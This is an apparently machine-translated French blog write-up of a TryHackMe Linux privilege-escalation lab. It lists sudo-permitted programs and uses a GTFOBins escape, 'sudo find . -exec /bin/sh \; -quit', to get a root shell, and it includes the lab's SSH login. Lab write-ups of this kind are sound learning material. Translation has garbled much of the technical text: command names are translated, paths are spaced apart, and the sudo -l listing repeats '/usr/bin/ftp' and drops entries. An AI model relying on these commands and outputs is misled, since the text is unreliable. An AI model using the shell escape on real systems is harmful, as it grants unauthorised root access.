![[Tryhackme] Amélioration du privilège à l'aide de gtfobins! Linux PRIVESC écrit la partie 3](https://hack-lab-256.com/wp-content/uploads/2023/03/hack-lab-256-samnail-9.jpg)
Cette fois, nous essaierons d'escalade des privilèges à l'aide de "gtfobins".
La machine cible utilise la pièce ci-dessous de Tryhackme.
"Tryhackme-Linux Privesc: https://tryhackme.com/room/linuxprivesc "
Cet article est la partie 3.
Si vous souhaitez consulter l'écriture pour Linux PrivesC avec TryhackMe, veuillez également vérifier l'élévation des privilèges avec des autorisations de fichiers vulnérables dans Linux
Piétiner
Piétiner
Piétiner
Piétiner
Préparation
Démarrage de la machine cible
Tout d'abord, démarrez la machine cible.
Rejoignez "TryhackMe-Linux Privesc: https://tryhackme.com/room/linuxprivesc
Si l'adresse IP s'affiche comme ceci, le démarrage est OK.
Connexion SSH
Connectez-vous à la machine cible que vous avez commencé à utiliser SSH.
Comme expliqué, c'est OK tant que vous pouvez vous connecter à l'aide de "User: Password321".
└─ $ ssh user@10.10.6.35 L'authenticité de l'hôte '10 .10.6.35 (10.10.6.35) 'ne peut pas être établie. L'empreinte digitale de la clés DSA est SHA256: p2nssfvyjvk1qe0tsnx5g2h8aawyrn71jdz3ueodbma. Cette clé n'est connue par d'autres noms, êtes-vous sûr de continuer à vous connecter (oui / non / [empreinte digitale])? Oui Avertissement: Ajout en permanence '10 .10.6.35 '(DSA) à la liste des hôtes connus. user@10.10.6.35's: Linux Debian 2.6.32-5-AMD64 # 1 SMP TUe 13 mai 16:34:35 UTC 2014 X86_64 Les programmes inclus avec le système Debian GNU / Linux sont un logiciel gratuit; Les termes de distribution exacts de chaque programme sont décrits dans les fichiers individuels dans / usr / share / doc / * / copyright. Debian GNU / Linux ne comporte absolument aucune garantie, dans la mesure permise par la loi applicable. Dernière connexion: ven 15 mai 06:41:23 2020 De 192.168.1.125 User @ debian: ~ $ sudo -l correspondant aux par défaut pour l'utilisateur sur cet hôte: Env_Reset, Env_keep + = ld_preload, Env_keep + = LD_LIBRARY_PATHVous devrez peut-être ajouter "-ohostKeyAlgorithms = + ssh-rsa".
Élévation des privilèges à l'aide de gtfobins
Maintenant, je voudrais essayer d'escalade des privilèges à l'aide de gtfobins.
Combien de programmes «utilisateur» est-il autorisé à fonctionner via Sudo? (Combien de programmes y a-t-il des programmes que «l'utilisateur» peut fonctionner via Sudo?)
Tout d'abord, je voudrais obtenir un programme que les utilisateurs peuvent exécuter dans SODO.
La commande est "sodo -l".
user @ debian: ~ $ sudo -l correspondant aux inscriptions par défaut pour l'utilisateur sur cet hôte: Env_Reset, Env_keep + = ld_preload, Env_keep + = ld_library_path l'utilisateur peut exécuter les commandes suivantes sur cet hôte: (root) nopasswd: / usr / sbin / root) nopasswdwd: / usr / bin / find) / / bin / nano (root) nopasswd: / usr / bin / vim (root) nopasswd: / usr / bin / man (root) nopasswd: / usr / bin / awk (root) nopasswd: / usr / bin / moins (root) nopasswd: / usr / bin / ftp (root) nopasswd: / usr / bin / ftp (root) nopasswd: / usr / bin / ftp (root) nopasswd: / usr / bin / ftp (root) nopasswd: / usr / bin / ftp (root) nopasswd: / usr / bin / ftp) (root) nopasswd: / usr / sbin / apache2 (root) nopasswd: / bin / PlusJ'ai trouvé que les 11 programmes ci-dessus peuvent être exécutés dans SODO.
Un programme sur la liste n'a pas de séquence d'échappement d'échappement sur les GTFobins. Lequel est-ce?
Ensuite, recherchez des programmes qui n'ont pas de séquence d'échappement SCHEL.
(Je suppose que c'est comme rechercher un programme avec une séquence d'échappement SCHEL.)
Quand j'ai cherché chacun, j'ai trouvé qu'il n'y avait pas de "apache2".
La réponse est "apache2".
Essayez d'élever les privilèges à l'aide de gtfobins
Essayons maintenant de dégénérer les privilèges.
Il devrait être possible si les éléments énumérés ci-dessus sont autres que "apache2". Cette fois, je vais l'essayer avec Find.
Tout d'abord, recherchez-vous sur Find et jetez un œil à Sodo.
Il semble que ce soit juste une question d'exécuter la commande, donc je vais essayer de l'exécuter pour l'implémenter.
utilisateur @ debian: ~ $ sudo trouver. -exec / bin / sh \; -Quit SH-4.1 # Root WhoamiJ'ai confirmé que j'ai été élevé à la racine.
C'est vraiment facile. . . Est-il normal d'être aussi simple? . .
résumé
Cette fois, nous avons essayé d'escalade des privilèges en utilisant "gtfobins".
C'était un peu décevant car il était très facile de dégénérer les privilèges, mais il semble qu'il puisse être utilisé.
Références et sites
Medium ( Shamsher Khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5
![[Hackthebox] Que faire si "une erreur de type httpclient :: receivetimeouterror s'est produite, le message est exécuté expiré" apparaît dans Evil-winrm](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] J'ai énuméré la samba partagée, manipulé une version vulnérable de ProfTPD et augmenté les privilèges en manipulant les variables de chemin! Tryhackme Kenobi écrit](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[CTF permanent pour les débutants] Setodanote CTF web writeUp! Recommandé pour avoir un sentiment de CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[Tryhackme] Nous avons effectué une analyse de paquets à l'aide de Wireshark pour étudier l'intrusion de SSH-Backdoor! SURPASS2 WRITEUP](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] CMS CMS 1.4.1 - J'ai converti l'exécution du code distant (1) en Python 3 et je l'ai piraté! Tryhackme Ignite WRIPUP](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[Tryhackme] J'ai utilisé SSH2John pour extraire le hachage de la clé privée et pira le mot de passe avec John the Ripper! SURPASS](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[Tryhackme] J'ai essayé d'infiltrer une machine Windows avec une attaque RET2ESP (débordement de tampon)! Brainstorming writing](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)